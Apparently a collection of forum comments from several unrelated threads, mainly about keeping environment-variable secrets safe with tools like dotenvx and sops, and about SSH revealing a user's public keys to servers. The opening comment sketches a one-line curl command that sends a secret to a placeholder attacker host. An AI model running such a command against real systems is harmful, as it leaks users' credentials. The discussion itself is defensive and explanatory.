How do you use them if you don't decrypt them? At some point you have to see them in plaintext. Even if they are sensitive and not shown in the UI you can still start an app and curl https://hacker.example/$my_encrypted_var to exfiltrate them.

What's best practice to handle env vars? How do poeple handle them "securely" without it just being security theater? What tools and workflows are people using?

Exactly. How do you play back the encrypted DVD without having the decryption key right there on the player for everyone to find?

Even Keepass's "encrypt in memory" option leaves that encryption key in memory, so it can auto-type or copy passphrases into form fields. It's an extra step, but not unbreakable.

And even then the passphrase is put into form fields in plaintext, so there's *got* to be some sort of attack to grab those. They must be in memory decrypted at some point.

It always comes back round to "you can't have your cake and eat it".

Yeah that's a good point. Dotenvx seems to claim a solution but I'm not smart enough to make sense of it.

However I do feel now like my sensitive things are better off deployed on a VPS where someone would need a ssh exploit to come at me.

dotenvx is a way to encrypt your secrets at rest. It's kinda like sops but not as good. https://getsops.io/

Notice how their tutorial says "run 'dotenvx run -- yourapp'". If you did 'dotenvx run -- env', all your secrets would be printed right there in plaintext, at runtime, since they're just encrypted at rest.

The equivalent in vercel would be encrypted in the database (the encrypted '.env' file), with a decryption key in the backend (the '.env.keys' file by default in dotenvx) used to show them in the frontend and decrypt them for running apps.

> If you did 'dotenvx run -- env', all your secrets would be printed right there in plaintext

Same for sops.

> The equivalent in vercel would be encrypted in the database (the encrypted '.env' file), with a decryption key in the backend

The encrypted .env file is actually committed to source code, and the decryption key is placed in Vercel's environment variables dashboard. The attacker only gained access to the latter here if using dotenvx so they can't get your secrets. Unless they also gained access to the codebase in which they have terabytes of data to go through and match up private keys from the database with encrypted .env files from the source code exfiltration - much more effort for attackers.

Creator of dotenvx here.

There is no silver bullet, but Dotenvx splits your secrets into two separate locations.

1. The private decryption key - which lives on Vercel in this example 2. The encrypted .env file which lives in your source code pushed to Vercel

Attackers only got access to the first (as far as I know was reported). So your secrets would be safe in this attack if using Dotenvx. (A private key is useless without its corresponding encrypted .env file. Attackers need both.)

The whitepaper goes into the problem and solution in more detail: https://dotenvx.com/whitepaper.pdf

>it costs me nothing to change my vocabulary

It cost reddit a 3 hour outage.

>The nodeSelector and peerSelector for the route reflectors target the label `node-role.kubernetes.io/master`. In the 1.20 series, Kubernetes changed its terminology from “master” to “control-plane.” And in 1.24, they removed references to “master,” even from running clusters. This is the cause of our outage.

https://old.reddit.com/r/RedditEng/comments/11xx5o0/you_brok...

The Internet: Where the men are men, the women are men and the children are FBI agents.

ssh by default sends all your public keys to a server. Yes you can limit some keys to specific hosts but it's very easy to dox yourself.

Doesn’t it try one key at a time rather than send all?

True but a server that wants to "deanonymize" you can just reject each key till he has all the default keys and the ones you added to your ssh agent.

You can try it yourself [0] returns all the keys you send and even shows you your github username if one of the keys is used there.

[0] ssh whoami.filippo.io

Nice, tried it out. This wording is incorrect though:

"Did you know that ssh sends all your public keys to any server it tries to authenticate to?"

It should be may send, because in the majority of cases it does not in fact send all your public keys.

It does, and there's typically a maximum number of attempts (MaxAuthTries defaults to 6 IIRC) before the server just rejects the connection attempt.

Yep, but this is server-side setting. Were I a sniffer, I would set this to 10000 and now I can correlate keys.

Modern sshd limits the number of retries. I have 5 or 6 keys and end up DoSing myself sometimes.

This thread made me realize why fail2ban keeps banning me after one failed password entry :lightbulb:

so it's good practice to store key in non-default location and use ~/.ssh/config to point the path for each host?

What a great case of "you're holding it wrong!" I need to add individual configuration to every host I ever want to connect to before connecting to avoid exposing all public keys on my device? What if I mistype and contact a server not my own by accident?

This is just an awfully designed feature, is all.

> add individual configuration to every host I ever want to connect

Are you AI?

You can wildcard match hosts in ssh config. You generally have less than a dozen of keys and it's not that difficult to manage.

I have over a dozen ssh keys (one for each service and duplicates for each yubikey) and other than the 1 time I setup .ssh/config it just works.

I have the setting to only send that specific host’s identity configured or else I DoS myself with this many keys trying to sign into a computer sitting next to me on my desk through ssh.

Like I can’t imagine complaining about adding 5 lines to a config file whenever you set up a new service to ssh onto. And you can effectively copy and paste 90% of those 5 short lines, just needing to edit the hostname and key file locations.

I would say it's best practice to use a key agent backed by a password manager.

Specifically to use a different key for each host.

I had never thought about that. Seems like an easy problem to fix by sending salted hashes instead.

The server matches your purposed public key with one in the authorized keys file. If you don't want to expose your raw public key to the server, you'll need to generate and send the hashed key format into the authorized keys file, which at that point is the same as just generating a new purpose built key, no? Am I missing something?

The NSA surely has ordered a backdoor.

>In December 2013, a Reuters news article alleged that in 2004, before NIST standardized Dual_EC_DRBG, NSA paid RSA Security $10 million in a secret deal to use Dual_EC_DRBG as the default in the RSA BSAFE cryptography library https://en.wikipedia.org/wiki/Dual_EC_DRBG

He uses the keys of his non-exit relay to directly connect from his workstation to an exit relay pretending to be the relay on his VPS. But yeah he could just use the VPS for wireguard which would be way easier.

I'm in Europe so I don't get less than 20Mbit/s on any circuit but I asume he could have got the same speed by just selecting a few local, fast nodes as bridge.

I had the same few years ago. When I pointed out that I can get full root with most of the whitelisted commands they answered "We know. It's not about security but to prevent lusers from accidentally rm -rf /* the server. Feel free to spawn a root shell. You obviously know what you do"

You never release exotic pets to the wild. Isn't that common knowledge by now? If you can no longer care for an animal bring it to the vet to get it euthanized.

Did you ask the bird whether it wants to be nuked by you - or, by proxy, the vet - here? I don't call murder "euthanization" - that is just propaganda to sell to yourself that you have the right to decide who lives and who does not.

Releasing it is just murder by neglect so people don't feel bad about themself that they actually killed their pet just because "they can't care" for it anymore aka they don't want to deal with the minor inconvenience of caring for a pet anymore. Or worse they become a pest that wipes out whole local ecosystems.

Right has nothing to do with it. It’s about power and responsibility.

It would be irresponsible to release parrot into an environment that is not its natural habitat.

You don't have to be cloudflare for this kind of analysis you can do it yourself without even needing an ASN using RIPE RIS.

https://www.ripe.net/analyse/internet-measurements/routing-i...

I doubt it's that much but with the same logic you could also ban HN, SSH and basically any protocol thats not https "with no one noticing" because 99.9+% doesnt use it.